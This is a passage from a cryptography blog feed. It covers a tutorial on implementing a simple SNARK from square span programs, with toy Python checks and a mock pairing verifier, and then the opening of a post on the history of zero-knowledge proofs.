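# polynomial identity over F_17, with m = 4 and omega = 4 (a primitive
# 4th root of unity, since 4**4 = 256 = 1 mod 17).
p, m, omega = 17, 4, 4
xs = [pow(omega, i, p) for i in range(m)]   # evaluation domain {omega^i}

def interp(xs, ys):
    # Lagrange interpolation over F_p; returns coefficients, lowest degree first.
    poly = [0] * len(xs)
    for i, (xi, yi) in enumerate(zip(xs, ys)):
        basis, denom = [1], 1
        for j, xj in enumerate(xs):
            if j != i:
                # multiply the basis polynomial by (x - xj)
                basis = [(a - xj * b) % p for a, b in zip([0] + basis, basis + [0])]
                denom = denom * (xi - xj) % p
        inv = pow(denom, p - 2, p)
        for k, c in enumerate(basis):
            poly[k] = (poly[k] + yi * c * inv) % p
    return poly

def ev(poly, x):
    acc = 0
    for c in reversed(poly):
        acc = (acc * x + c) % p
    return acc

# Four rows whose dot product with z = (1, 1) is 1 or -1, so (U z) o (U z) = 1.
U = [[1, 0], [1, 0], [p - 1, 2], [0, p - 1]]
z = [1, 1]
vals = [sum(uij * zj for uij, zj in zip(row, z)) % p for row in U]
V = interp(xs, vals)                        # V(omega^i) = (U z)_i
assert all(pow(ev(V, x), 2, p) == 1 for x in xs)

# p(x) = V(x)^2 - 1 must be divisible by Z(x) = x^m - 1. Reduce modulo
# x^m - 1 by folding exponents (x^m = 1) and check the remainder is zero.
P = [0] * (2 * len(V) - 1)
for i, a in enumerate(V):
    for j, b in enumerate(V):
        P[i + j] = (P[i + j] + a * b) % p
P[0] = (P[0] - 1) % p
rem = [0] * m
for i, c in enumerate(P):
    rem[i % m] = (rem[i % m] + c) % p
assert all(c == 0 for c in rem)
```

&lt;p&gt;Since $p(x)$ vanishes on all $m$ roots of $x^m - 1$ and the remainder has degree below $m$, the remainder must be identically zero, which is exactly the divisibility claim.&lt;&#x2F;p&gt;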
&lt;p&gt;One way to show that the computation described by the system of equations is valid is to provide $p(x)$ and $q(x)$ and let the verifier check the equality directly. The problem is that we would have to send all the coefficients of both polynomials (which grow with the size of the computation) and have the verifier compute the right-hand side and check that it equals the left-hand side. Besides, we would also leak information about the witness! How can we make this succinct without leaking information?&lt;&#x2F;p&gt;
&lt;h3 id=&quot;polynomial-commitment-schemes&quot;&gt;Polynomial commitment schemes&lt;&#x2F;h3&gt;
&lt;p&gt;A polynomial commitment scheme is given by four algorithms: setup, commit, open, and evaluate. The commitment allows us to bind ourselves to a given polynomial using short data and later be able to prove things about that polynomial. The commitment scheme must satisfy the following two properties:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Hiding: the commitment does not reveal anything about the committed polynomial.&lt;&#x2F;li&gt;
&lt;li&gt;Binding: given the commitment $\mathrm{cm} (p)$ to $p(x)$, it is infeasible to find another polynomial $q(x)$ such that $\mathrm{cm} (p) = \mathrm{cm} (q)$.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;One way to build a PCS is by using a pairing-friendly elliptic curve, such as BN254 or BLS12-381. We will work here with type-3 pairings, which are functions $e: G_1 \times G_2 \rightarrow G_t$ with the following properties:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Bilinearity: $e(a g_1 , b g_2) = e(g_1 , g_2 )^{ab}$.&lt;&#x2F;li&gt;
&lt;li&gt;Non-degeneracy: if $e(P,Q) = 1$, then either $P = \mathcal{O}$ or $Q = \mathcal{O}$.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;The &lt;a href=&quot;&#x2F;mina-to-ethereum-bridge&#x2F;&quot;&gt;KZG commitment scheme&lt;&#x2F;a&gt;, which is the tool we will use, works in this setting. Why are pairings useful? Because they give us a way to multiply values hidden inside an elliptic curve group.&lt;&#x2F;p&gt;
&lt;p&gt;We pick a random $s$ (which is unknown to both the prover and verifier), and we generate the following points in the elliptic curve&lt;br &#x2F;&gt;
$\{ P_0 , P_1 , …, P_n \} = \{ g_1 , s g_1 , …, s^n g_1 \}$&lt;br &#x2F;&gt;
These points contain the powers of $s$ hidden inside a group of the elliptic curve. Given any $P_k$, recovering $s$ is computationally intractable due to the hardness of the discrete log problem over elliptic curves.&lt;&#x2F;p&gt;
&lt;p&gt;We commit to the polynomial by computing&lt;br &#x2F;&gt;
$p(s) g_1 = \sum a_k (s^k g_1 ) = \sum a_k P_k$&lt;br &#x2F;&gt;
where $g_1$ is a generator of the group&#x2F;subgroup of prime order $r$ of the elliptic curve. We could also commit using elements in $G_2$, where we have $g_2$ as a subgroup generator.&lt;&#x2F;p&gt;
&lt;p&gt;Using pairings, we could prove the relationship between the polynomial $p(x)$ and the quotient $q(x)$ by computing two pairings and checking their equality:&lt;br &#x2F;&gt;
$e( p(s) g_1 , g_2) = e(g_1 , g_2 )^{p(s)}$&lt;br &#x2F;&gt;
$e(q(s) g_1 , s^m g_2 - g_2) = e(g_1 , g_2 )^{ q(s)(s^m - 1)}$&lt;br &#x2F;&gt;
Since $s$ is chosen at random, if $p(s) = q(s) Z(s)$, then with overwhelming probability, we have that $p(x) = q(x) Z(x)$.&lt;&#x2F;p&gt;
&lt;p&gt;With this construction, we do not need to supply the verifier with the coefficients of the polynomials, only their commitments. This solves part of the problem but not everything.&lt;&#x2F;p&gt;
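&lt;p&gt;The following mock sketch of ours keeps the scalars in the clear, so it has no cryptographic security whatsoever; it only traces the algebra of the pairing check: if $p(x) = q(x) Z(x)$, both sides agree at a random $s$, while a polynomial not divisible by $Z(x)$ fails:&lt;&#x2F;p&gt;

```python
# Mock illustration (ours): the "pairing" below just multiplies exponents
# mod r, so there is no security here; it only traces the algebra.
r = 17                         # toy order; real schemes use a large prime r

def e(a, b):                   # stands in for e(a*g1, b*g2) = e(g1, g2)^(a*b)
    return a * b % r

def Z(x):                      # vanishing polynomial Z(x) = x^4 - 1
    return (pow(x, 4, r) - 1) % r

def q(x):                      # a toy quotient q(x) = x + 2
    return (x + 2) % r

def p_(x):                     # p(x) = q(x) * Z(x), so p is divisible by Z
    return q(x) * Z(x) % r

s = 5                          # "toxic waste"; known here only because it is a mock
assert e(p_(s), 1) == e(q(s), Z(s))        # the check passes when p = q * Z

def bad(x):                    # a polynomial NOT divisible by Z(x)
    return (q(x) * Z(x) + 3) % r

assert e(bad(s), 1) != e(q(s), Z(s))       # and fails otherwise
```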
&lt;h3 id=&quot;intuition-for-the-protocol&quot;&gt;Intuition for the protocol&lt;&#x2F;h3&gt;
&lt;p&gt;The program&#x2F;circuit that we want to prove is defined by the matrix $U$. When we define a particular instance&#x2F;public input $u$ to the circuit, if $u$ is valid, we should be able to find some $w$ that solves the system of equations. To make the proof succinct, we should send much less information than the full witness (besides, if we want zero-knowledge, the witness should be kept secret).&lt;&#x2F;p&gt;
&lt;p&gt;We have the polynomial $p(x)$ of the problem, the vanishing polynomial $Z(x)$, and the quotient $q(x)$. In the end we want to prove that&lt;br &#x2F;&gt;
$p(x) = Z(x)q(x)$&lt;br &#x2F;&gt;
if the computation is valid. $Z(x)$ is known to both the prover and the verifier, and we could even commit to $Z(x)$ as part of the public information. We can reduce this check to just one point $x = s$ and verify this using pairings. However, this check alone would be insufficient since the prover could provide any polynomial $p(x)$. If we recall how we build $p(x)$,&lt;br &#x2F;&gt;
$\left(\sum_j U_{j} (x) z_j \right)^2 - 1 = p(x)$&lt;br &#x2F;&gt;
Some terms in the summation can be computed by the verifier (since they are public). However, the verifier does not know the witness terms, and we do not want to reveal them. The solution is for the prover to send the summation restricted to the witness values,&lt;br &#x2F;&gt;
$$V_w (x) = \sum_{j \in w} w_j U_j(x)$$&lt;br &#x2F;&gt;
Moreover, we can provide a commitment to $V_w (x)$ using the commitment scheme we had before, $V_w (s) g_1$ and $V_w (s) g_2$ (we will show why we need both soon). The verifier can then compute&lt;br &#x2F;&gt;
$$V_u (x) = \sum_{j \in u} u_j U_j(x)$$&lt;br &#x2F;&gt;
and get $V_u (s) g_1$ and $V_u (s) g_2$. The verifier can compute the pairing involving $e( p(s) g_1 , g_2)$ in an equivalent way,&lt;br &#x2F;&gt;
$$e ( V_u (s) g_1 + V_w(s) g_1 , V_u (s) g_2 + V_w(s) g_2 ) e ( g_1 , g_2 )^{ - 1 } = e( p(s) g_1 , g_2)$$&lt;br &#x2F;&gt;
This looks odd, but if we take all the scalars to the exponent, we have $(V_u (s) + V_w (s))(V_u (s) + V_w (s)) - 1$, and the verifier can get the polynomial of the circuit. So, we get the first check,&lt;br &#x2F;&gt;
$$e ( V_u (s) g_1 + V_w(s) g_1 , V_u (s) g_2 + V_w(s) g_2 ) e ( g_1 , g_2 )^{ - 1 } = e( q(s) g_1 , Z(s)g_2)$$&lt;&#x2F;p&gt;
&lt;p&gt;We have one problem, though. How do we know that the prover used the same $V_w (x)$ in both commitments? Luckily, we can solve this with another pairing check,&lt;br &#x2F;&gt;
$e( V_w (s) g_1 , g_2 ) = e( g_1 , V_w(s) g_2 )$&lt;&#x2F;p&gt;
&lt;p&gt;We got another check. Finally, how do we know that the prover computed $V_w (x)$ correctly and did not use some arbitrary linear combination that cancels out with the public input and yields something that passes?&lt;&#x2F;p&gt;
&lt;p&gt;We could force the prover to provide the same linear combination, but with the points all shifted by some constant $\beta$, unknown to the parties. We define&lt;br &#x2F;&gt;
$B_w (x) = \sum \beta w_j U_j (x) = \beta V_w (x)$&lt;br &#x2F;&gt;
We can do one final check for this relationship using pairings,&lt;br &#x2F;&gt;
$e( B_w (s) g_1 , \gamma g_2 ) = e( \gamma \beta g_1 , V_w (s) g_2 )$&lt;br &#x2F;&gt;
where $\gamma$ is also unknown to the parties. This makes it impossible for the prover to build fake polynomials for $V_w (x)$. We can see that if this condition did not exist, we could create any $V_w (x) = C Z(x) - V_u (x) + 1$, which would pass all the other checks for any $C$ of our choice. In fact,&lt;br &#x2F;&gt;
$V_w (x) + V_u (x) = C Z(x) + 1$&lt;br &#x2F;&gt;
But $p(x) = (V_w (x) + V_u (x))^2 - 1$, so&lt;br &#x2F;&gt;
$p(x) = C^2 Z(x)^2 + 2C Z(x) = Z(x) (C^2 Z(x) + 2C)$&lt;br &#x2F;&gt;
and we find that $q(x) = C^2 Z(x) + 2C$, even though we do not know the witness.&lt;&#x2F;p&gt;
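&lt;p&gt;This attack can be verified numerically over a toy field (an illustration of ours; expanding $(C Z + 1)^2 - 1$ gives the quotient $C^2 Z(x) + 2C$, with the cross term doubled):&lt;&#x2F;p&gt;

```python
# Toy field check (ours) of the forgery: for any C, setting
# V_w(x) = C*Z(x) - V_u(x) + 1 makes p(x) divisible by Z(x) with
# quotient q(x) = C^2 * Z(x) + 2*C, with no witness involved.
p = 17
C = 5

def Z(x):
    return (pow(x, 4, p) - 1) % p

def V_u(x):                     # arbitrary stand-in for the public part
    return (3 * x + 7) % p

def V_w(x):                     # the forged witness polynomial
    return (C * Z(x) - V_u(x) + 1) % p

def q(x):                       # the claimed quotient
    return (C * C % p * Z(x) + 2 * C) % p

for x in range(p):              # the identity holds at every point of F_17
    lhs = (pow((V_u(x) + V_w(x)) % p, 2, p) - 1) % p
    assert lhs == Z(x) * q(x) % p
```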
&lt;p&gt;The proof $\pi$ will consist of:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;The commitment to $V_w (x)$ using $g_1$.&lt;&#x2F;li&gt;
&lt;li&gt;The commitment to $V_w (x)$ using $g_2$.&lt;&#x2F;li&gt;
&lt;li&gt;The commitment to the quotient polynomial $q(x)$ using $g_1$.&lt;&#x2F;li&gt;
&lt;li&gt;The commitment to $B_w (x)$ using $g_1$.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;The verification involves six pairings (the pairing $e(g_1 , g_2)^{ - 1}$ can be precomputed since it is a constant), to check the three conditions we mentioned.&lt;&#x2F;p&gt;
&lt;p&gt;To compute the commitments, we need parameters $s , \beta , \gamma$ to be unknown to both parties (hence, they are toxic waste). We need to generate a reference string, which will be circuit dependent (that is because we need to provide $\beta U_j(s) g_1$). With all this, we can jump into the implementation.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;implementation&quot;&gt;Implementation&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;setup&quot;&gt;Setup&lt;&#x2F;h3&gt;
&lt;p&gt;Prover and verifier agree on a pairing-friendly elliptic curve and generators of the groups $G_1$ and $G_2$, denoted by $g_1$ and $g_2$, respectively. In our case, we choose BLS12-381. The proving key consists of the following:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;$\{ s^k g_1 \}$ for $k = 0, 1, 2, … , m$.&lt;&#x2F;li&gt;
&lt;li&gt;$\{ U_j (s) g_1 \}$ for $j = l , l + 1 , … , m$ ($l$ being the number of public inputs).&lt;&#x2F;li&gt;
&lt;li&gt;$\{ U_j (s) g_2 \}$ for $j = l , l + 1 , … , m$.&lt;&#x2F;li&gt;
&lt;li&gt;$\{ \beta U_j (s) g_1 \}$ for $j = l , l + 1 , … , m$.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;The verifying key consists of the following:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;$\{ U_j (s) g_1 \}$ for $j = 0 , 1 , … , l - 1$.&lt;&#x2F;li&gt;
&lt;li&gt;$\{ U_j (s) g_2 \}$ for $j = 0 , 1 , … , l - 1$.&lt;&#x2F;li&gt;
&lt;li&gt;$[Z^\prime ] = (s^m - 1)g_2$ (commitment to the vanishing polynomial).&lt;&#x2F;li&gt;
&lt;li&gt;$e(g_1 , g_2)^{ - 1}$.&lt;&#x2F;li&gt;
&lt;li&gt;$\beta \gamma g_1$.&lt;&#x2F;li&gt;
&lt;li&gt;$\gamma g_2$.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;&lt;h3 id=&quot;prove&quot;&gt;Prove&lt;&#x2F;h3&gt;
&lt;p&gt;The steps for the prover are as follows:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Compute $[V_w ] = V_w (s) g_1$, $[V_w^\prime ] = V_w (s) g_2$, and $[B_w ] = B_w (s) g_1$ using the proving key.&lt;&#x2F;li&gt;
&lt;li&gt;Compute the quotient polynomial $q(x)$ from the zerofier $Z(x)$, the witness and instance vector, and the polynomials $U_j (x)$ describing the circuit.&lt;&#x2F;li&gt;
&lt;li&gt;Compute $[q ] = q(s) g_1$ using the proving key.&lt;&#x2F;li&gt;
&lt;li&gt;Produce the proof $\pi = ( [q] , [V_w ] , [V_w^\prime ] , [B_w ])$.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;&lt;h3 id=&quot;verify&quot;&gt;Verify&lt;&#x2F;h3&gt;
&lt;p&gt;The verifier has the following steps:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Parse the proof $\pi$ as $[q] , [V_w ] , [V_w^\prime ] , [B_w ]$.&lt;&#x2F;li&gt;
&lt;li&gt;Check $e( [V_w ] , g_2 ) = e( g_1 , [V_w^\prime ])$.&lt;&#x2F;li&gt;
&lt;li&gt;Check $e( [B_w] , \gamma g_2) = e( \beta \gamma g_1 , [V_w^\prime ])$.&lt;&#x2F;li&gt;
&lt;li&gt;Compute $[V_u ] = V_u (s) g_1$ and $[V_u^\prime ] = V_u (s) g_2$ using the verifying key.&lt;&#x2F;li&gt;
&lt;li&gt;Check $e([V_u ] + [V_w ] , [V_u^\prime ] + [V_w^\prime ])e(g_1 , g_2)^{ - 1} = e( [q] , [Z^\prime])$.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;If all checks pass, the proof is valid.&lt;&#x2F;p&gt;
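&lt;p&gt;Here is a mock run of ours of the three checks with scalars stored in the clear (no elliptic-curve groups; the values are chosen to be mutually consistent rather than derived from a real circuit):&lt;&#x2F;p&gt;

```python
# Mock run (ours) of the three verifier checks with scalars in the clear:
# no elliptic curves here, and the values are chosen to be consistent
# rather than derived from a real circuit.
r = 101                                  # toy prime order
e = lambda a, b: a * b % r               # mock pairing into exponents mod r

s, beta, gamma = 5, 11, 7                # toxic waste; visible only in this mock
Zs = (pow(s, 4, r) - 1) % r              # Z(s) for Z(x) = x^4 - 1
Vu, Vw = 9, 23                           # assumed evaluations V_u(s), V_w(s)
qs = (pow(Vu + Vw, 2, r) - 1) * pow(Zs, r - 2, r) % r    # q(s) = p(s) / Z(s)

proof = {"q": qs, "Vw1": Vw, "Vw2": Vw, "Bw": beta * Vw % r}

# 1. the same V_w was used in both groups
assert e(proof["Vw1"], 1) == e(1, proof["Vw2"])
# 2. B_w really is beta * V_w
assert e(proof["Bw"], gamma) == e(beta * gamma % r, proof["Vw2"])
# 3. main equation: subtracting 1 plays the role of the e(g1, g2)^(-1) factor
lhs = (e(Vu + proof["Vw1"], Vu + proof["Vw2"]) - 1) % r
assert lhs == e(proof["q"], Zs)
```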
&lt;h3 id=&quot;optimizations&quot;&gt;Optimizations&lt;&#x2F;h3&gt;
&lt;ol&gt;
&lt;li&gt;Interpolation is done using the Fast Fourier Transform (FFT). This is possible because the multiplicative group of BLS12-381’s scalar field has order divisible by $2^{32}$, so it contains the roots of unity the FFT needs.&lt;&#x2F;li&gt;
&lt;li&gt;The quotient is calculated in evaluation form, using the FFT. We need to evaluate the polynomials at $\mu \omega^k$, where $\mu$ is the offset (we evaluate on cosets because evaluating directly over $D_i$ gives $0&#x2F;0$).&lt;&#x2F;li&gt;
&lt;li&gt;The evaluation of the vanishing polynomial is straightforward: $Z(\mu \omega^k ) = (\mu \omega^k )^m - 1 = \mu^m - 1$, because $\omega$ has order $m$.&lt;&#x2F;li&gt;
&lt;li&gt;Multiscalar multiplications are computed using Pippenger’s algorithm.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;&lt;h3 id=&quot;turning-the-snark-into-a-zk-snark&quot;&gt;Turning the SNARK into a zk-SNARK.&lt;&#x2F;h3&gt;
&lt;p&gt;The protocol above is not zero-knowledge since $V_w (x)$ can be distinguished from a random-looking $V (x)$. To make it zero-knowledge, the prover has to sample a random value $\delta$ and make the following changes to the polynomials:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;The polynomial becomes $p(x) = \left(\sum_j z_j U_j(x) + \delta Z(x) \right)^2 - 1$. Note that adding $\delta Z(x)$ does not change the main condition: the constraints are satisfied if and only if $p(x)$ is divisible by $Z(x)$.&lt;&#x2F;li&gt;
&lt;li&gt;Compute $[V_w ] = (V_w (s) + \delta Z(s)) g_1$, $[V_w^\prime ] = (V_w (s) + \delta Z(s)) g_2$, and $[B_w ] = (B_w (s) + \beta \delta Z(s)) g_1$.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;The verifier’s steps are unchanged.&lt;&#x2F;p&gt;
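&lt;p&gt;The reason this masking works is that $Z(x)$ vanishes on the evaluation domain, so $\delta Z(x)$ is invisible exactly where the constraints are enforced; a quick toy check of ours:&lt;&#x2F;p&gt;

```python
# Toy check (ours): the mask delta * Z(x) is invisible on the evaluation
# domain, because Z vanishes at every omega^i, so constraints are unaffected.
p, m, omega, delta = 17, 4, 4, 6
dom = [pow(omega, i, p) for i in range(m)]

def Z(x):
    return (pow(x, m, p) - 1) % p

def V(x):                      # stand-in for sum_j z_j U_j(x)
    return (2 * x + 3) % p

for x in dom:
    masked = (V(x) + delta * Z(x)) % p
    assert masked == V(x)      # Z(omega^i) = 0, so masking changes nothing here
assert Z(2) != 0               # off the domain, the mask does shift the value
```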
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;This post covered implementing a simple SNARK based on square span problems. We gave an intuition on how the protocol works and why we need different checks to achieve security. We hope this will enable newcomers to learn some of the basic concepts and workflow for ZKPs.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Our highly subjective view on the history of Zero-Knowledge Proofs</title>
          <pubDate>Sat, 17 Feb 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/our-highly-subjective-view-on-the-history-of-zero-knowledge-proofs/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/our-highly-subjective-view-on-the-history-of-zero-knowledge-proofs/</guid>
<description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/our-highly-subjective-view-on-the-history-of-zero-knowledge-proofs/">&lt;p&gt;Zero-knowledge, Succinct, Non-interactive ARguments of Knowledge (zk-SNARKs) are powerful cryptographic primitives that allow one party, the prover, to convince another party, the verifier, that a given statement is true without revealing anything other than the validity of the statement. They have gained widespread attention due to their applications in verifiable private computation, providing proof of the correctness of the execution of computer programs and helping scale blockchains. We think SNARKs will have a significant impact in shaping our world, as we describe in our &lt;a href=&quot;&#x2F;transforming-the-future-with-zero-knowledge-proofs-fully-homomorphic-encryption-and-new-distributed-systems-algorithms&#x2F;&quot;&gt;post&lt;&#x2F;a&gt;. SNARK is an umbrella term for different types of proof systems, using different polynomial commitment schemes (PCS), arithmetization schemes, interactive oracle proofs (IOP), or probabilistically checkable proofs (PCP). However, the basic ideas and concepts date back to the mid-1980s. Development accelerated significantly after the introduction of Bitcoin and Ethereum, which proved to be an exciting and powerful use case, since they can be scaled using zero-knowledge proofs (generally called validity proofs for this particular use case). SNARKs are an essential tool for blockchain scalability. As Ben-Sasson describes, the last years have seen a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;starkware&#x2F;cambrian-explosion-of-cryptographic-proofs-5740a41cdbd2&quot;&gt;Cambrian explosion of cryptographic proofs&lt;&#x2F;a&gt;. Each proof system offers advantages and disadvantages and was designed with certain tradeoffs in mind. 
Advances in hardware, better algorithms, new arguments, and gadgets result in enhanced performance and the birth of new systems. Many of them are used in production, and we keep pushing the boundaries. Will we have a general proof system for all applications or several systems suited for different needs? We think that it is unlikely that one proof system will rule them all because:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. The diversity of applications.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. The types of constraints we have (regarding memory, verification times, proving times).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. The need for robustness (if one proof system gets broken, we still have others).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Even if proof systems change a lot, they all offer a significant property: proofs can be verified quickly. Having a layer that verifies proofs and can be easily adapted to handle new proof systems solves the difficulties associated with changing the base layer, such as Ethereum. To give an overview of the different characteristics of SNARKs:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Cryptographic assumptions: collision-resistant hash functions, discrete log problem over elliptic curves, knowledge of exponent.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Transparent vs trusted setup.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Prover time: linear vs superlinear.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Verifier time: constant time, logarithmic, sublinear, linear.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Proof size.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Ease of recursion.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Arithmetization scheme.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Univariate vs multivariate polynomials.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This post will look into the origins of SNARKs, some fundamental building blocks, and the rise (and fall) of different proof systems. The post does not intend to be an exhaustive analysis of proof systems. We focus instead on those that had an impact on us. Of course, these developments were only possible with the great work and ideas of the pioneers of this field.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;fundamentals&quot;&gt;Fundamentals&lt;&#x2F;h2&gt;
&lt;p&gt;As we mentioned, zero-knowledge proofs are not new. The definitions, foundations, important theorems, and even important protocols were established in the mid-1980s. Some of the key ideas and protocols that we use to build modern SNARKs were proposed in the 1990s (the sumcheck protocol) or even before the advent of Bitcoin (GKR in 2007). The main obstacles to their adoption were the lack of a powerful use case (the internet was not as developed in the 1990s) and the amount of computational power needed.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;zero-knowledge-proofs-the-origins-1985-1989&quot;&gt;Zero-knowledge proofs: the origins (1985&#x2F;1989)&lt;&#x2F;h3&gt;
&lt;p&gt;The field of zero-knowledge proofs made its appearance in academic literature with the paper by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;people.csail.mit.edu&#x2F;silvio&#x2F;Selected%20Scientific%20Papers&#x2F;Proof%20Systems&#x2F;The_Knowledge_Complexity_Of_Interactive_Proof_Systems.pdf&quot;&gt;Goldwasser, Micali and Rackoff&lt;&#x2F;a&gt;. For a discussion on the origins, you can see the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=uchjTIlPzFo&quot;&gt;following video&lt;&#x2F;a&gt;. The paper introduced the notions of completeness, soundness, and zero-knowledge, providing constructions for quadratic residuosity and quadratic non-residuosity.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;sumcheck-protocol-1992&quot;&gt;Sumcheck protocol (1992)&lt;&#x2F;h3&gt;
&lt;p&gt;The &lt;a href=&quot;&#x2F;have-you-checked-your-sums&#x2F;&quot;&gt;sumcheck protocol&lt;&#x2F;a&gt; was proposed by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;dl.acm.org&#x2F;doi&#x2F;pdf&#x2F;10.1145&#x2F;146585.146605&quot;&gt;Lund, Fortnow, Karloff, and Nisan&lt;&#x2F;a&gt; in 1992. It is one of the most important building blocks for succinct interactive proofs. It helps us reduce a claim over the sum of a multivariate polynomial’s evaluations to a single evaluation at a randomly chosen point.&lt;&#x2F;p&gt;
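To make that reduction concrete, here is a minimal honest-prover sumcheck in Python over a toy prime field. The polynomial `g`, the modulus, and the round structure are illustrative assumptions, not the original LFKN presentation: in each round the prover's univariate polynomial is represented only by the evaluations the verifier needs.

```python
import random
from itertools import product

P = 97  # toy prime field, for illustration only

def g(x, y, z):
    # example 3-variate polynomial over F_P
    return (2 * x * y + 3 * y * z + x + 5) % P

def partial_sum(fixed, g, n):
    # sum g over all boolean assignments of the variables after `fixed`
    total = 0
    for tail in product([0, 1], repeat=n - len(fixed)):
        total = (total + g(*fixed, *tail)) % P
    return total

def sumcheck(g, n):
    # prover's claim: the sum of g over the boolean hypercube {0,1}^n
    claimed = partial_sum((), g, n)
    rs = []
    expected = claimed
    for _ in range(n):
        # prover sends the round polynomial s_i; we only materialize
        # the evaluations s_i(0) and s_i(1) the verifier checks
        s0 = partial_sum(tuple(rs) + (0,), g, n)
        s1 = partial_sum(tuple(rs) + (1,), g, n)
        assert (s0 + s1) % P == expected  # verifier's consistency check
        r = random.randrange(P)           # verifier's random challenge
        rs.append(r)
        expected = partial_sum(tuple(rs), g, n)  # honest prover's s_i(r)
    # final check: a single evaluation of g at the random point
    assert g(*rs) % P == expected
    return claimed
```

After `n` rounds, the claim about `2^n` evaluations has been reduced to one evaluation of `g` at a random point, which is exactly the reduction described above.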
&lt;h3 id=&quot;goldwasser-kalai-rothblum-gkr-2007&quot;&gt;Goldwasser-Kalai-Rothblum (GKR) (2007)&lt;&#x2F;h3&gt;
&lt;p&gt;The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.microsoft.com&#x2F;en-us&#x2F;research&#x2F;wp-content&#x2F;uploads&#x2F;2016&#x2F;12&#x2F;2008-DelegatingComputation.pdf&quot;&gt;GKR protocol&lt;&#x2F;a&gt; is an interactive protocol that has a prover that runs linearly in the number of gates of a circuit, while the verifier runs sublinearly in the size of the circuit. In the protocol, the prover and verifier agree on an arithmetic circuit of fan-in-two over a finite field of depth $d$, with layer $d$ corresponding to the input layer and layer $0$ being the output layer. The protocol starts with a claim regarding the output of the circuit, which is reduced to a claim over the values of the previous layer. Using recursion, we can turn this into a claim over the circuit’s inputs, which can be checked easily. These reductions are achieved via the sumcheck protocol.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;kzg-polynomial-commitment-scheme-2010&quot;&gt;KZG polynomial commitment scheme (2010)&lt;&#x2F;h3&gt;
